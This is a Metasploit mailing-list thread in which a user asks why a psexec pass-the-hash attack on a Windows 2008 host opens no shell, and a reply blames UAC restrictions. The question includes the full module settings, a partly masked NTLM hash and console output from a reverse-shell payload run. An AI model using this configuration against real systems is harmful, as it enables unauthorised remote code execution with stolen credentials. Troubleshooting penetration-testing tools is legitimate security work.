Metasploit mailing list archives
Re: psexec
From: Enis Sahin <enis.c.sahin () gmail com>
Date: Thu, 20 Oct 2011 08:54:56 +0300
Could be because "Vista/Win7/2008 with UAC drops admin privs on SMB shares for local users, which prevents the psexec module from writing it's executable/service to the remote host when using a local admin credential." Source: http://dev.metasploit.com/redmine/issues/5316 Enis On 19/10/2011, audio audience <audience099 () gmail com> wrote:
Hello All, I have a remote system. This running win2k8 x86 system and i have all users hash. However, i ran psexec exploit but it's couldn't successfully. - Disabled antivirus - Checked regedit key : "RequireSecuritySignature" to "0". http://www.offensive-security.com/metasploit-unleashed/PSexec_Pass_The_Hash Do you have any idea this jobs ?.. msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST [IP Address] yes The target address RPORT 445 yes Set the SMB service port SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass aad3bxxxxxxxxxx33435b61404ee:a7649e53c5d07306b78bfc7b2029a798 no The password for the specified username SMBUser Administrator no The username to authenticate as Payload options (windows/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 0.0.0.0 yes The listen address LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(psexec) > exploit [*] Started reverse handler on 0.0.0.0:4443 [*] Connecting to the server... [*] Authenticating to [IP Address]:445|WORKGROUP as user 'Administrator'... [*] Uploading payload... [*] Created \uqSjtJEP.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[IP Address][\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (nGbXrAdw - "MUQefrtYtKijwX")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \uqSjtJEP.exe... [*] Exploit completed, but no session was created. msf exploit(psexec) >
-- http://www.enissahin.com | http://twitter.com/enis_sahin _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- psexec audio audience (Oct 19)
- Re: psexec todb (Oct 19)
- Re: psexec Enis Sahin (Oct 19)